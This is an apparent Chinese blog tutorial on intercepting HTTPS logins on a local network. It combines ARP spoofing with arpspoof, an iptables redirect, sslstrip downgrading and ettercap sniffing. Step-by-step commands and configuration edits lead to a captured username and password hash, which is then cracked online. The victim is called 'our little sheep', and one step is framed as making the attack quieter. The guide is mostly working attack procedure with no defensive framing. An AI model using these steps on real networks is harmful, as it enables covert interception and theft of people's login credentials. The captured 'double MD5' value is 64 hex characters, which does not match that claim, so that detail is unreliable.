SSL/TLS中间人arp劫持

2022-03-09 15:37:15 浏览数 (2)

使用sslstrip环境配合ettercap进行arp劫持抓密码

(适用HTTPS和HTTP页面)

arp劫持测试局限

1.浏览器使用安全性较低的ie

2.有的https页面防护做的好可能出现页面不显示,或者密码抓不到

目标者ip:192.168.1.160

攻击者ip:192.168.1.162

一.开启IP转发(开启IP转发的目的是为了能够开启ARP劫持)

(1)利用ip_forward检查ip转发状态:

代码语言:javascript复制
cat /proc/sys/net/ipv4/ip_forward

状态为0,说明ip转发关闭

(2)开启ip转发:

代码语言:javascript复制
echo 1 >> /proc/sys/net/ipv4/ip_forward

(3)再次检查ip转发状态:

显示状态为1,表示已经成功开启ip转发!

二.使用ARPspoof工具进行ARPspoof欺骗攻击(arpspoof工具的作用是将目标的流量流向攻击者的计算机中)

(1)下面是利用ARP毒化,重定向受害者的流量传送给攻击者。(将攻击者插入目标与网关之间)

首先将目标机(192.168.1.160)的流量与网关(192.168.1.1)建立arp欺骗:

流量会一直跑,开着不动它

(2)其次是将攻击者(192.168.1.162)与网关(192.168.1.1)建立ARP欺骗:

代码语言:javascript复制
arpspoof -i eth0 -t 192.168.1.1 192.168.1.162

设置好该项也不关闭它,让它一直跑着流量。

建立好着两个ARP欺骗,ARP欺骗的部分就设置好了。

三.使用iptables(linux下ip信息包过滤系统)设置防止网页出现报错。(这是为了让攻击更加悄无声息)

(1)使用iptables设置防止网页报错:

代码语言:javascript复制
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

设置完成 -t:指定操作表;-p:指定协议;--destination-port:目标端口;-j:跳(可加载扩展)

四.设置嗅探(抓包)工具Ettercap的配置文件etter.conf内容。(ettercap工具只有在配置完毕后才可使用)

(1)修改etter.conf文件配置:vim /etc/ettercap/etter.conf

回车

点击E(表示编辑文档)

点击Shift :(表示输入命令)

输入set number(表示显示文档行数)

将16行改为ec_uid=0

将17行改为ec_gid=0

将178行redir之前的#去掉

将179行redir之前的#也去掉

再点击Shift :(表示输入命令)

wq!

回车

这样嗅探工具Ettercap下etter.conf文档的配置就完成了,接下来就可以启用Ettercap对目标进行嗅探抓包了

五.开启sslstrip工具(sslstrip是将https变为http)

(1)开启sslstrip工具,将https页面变为可利用的http页面:sslstrip –a –f –k

六.开启Ettercap嗅探模式,当目标有操作时可对目标进行抓包(抓取目标登录信息)

(1)开启ettercap进行抓包:ettercap

抓包模式已经开启

七.目标(我们的小绵羊)浏览https登录界面时(XXX为例)

(1)目标浏览XXX网

代码语言:javascript复制
账号:sssss
密码:sssss

(2)接下来我们看ettercap中抓到的结果

捕获:

代码语言:javascript复制
账号:sssss
密码:65a6a04c7194d24e4be9dd9c716c379983df97a004916099b60b443097959d28

密码是双md5加密的

(3)解密md5密码(登录在线MD5解密网站)

代码语言:javascript复制
解除账号的密码为:sssss

0 人点赞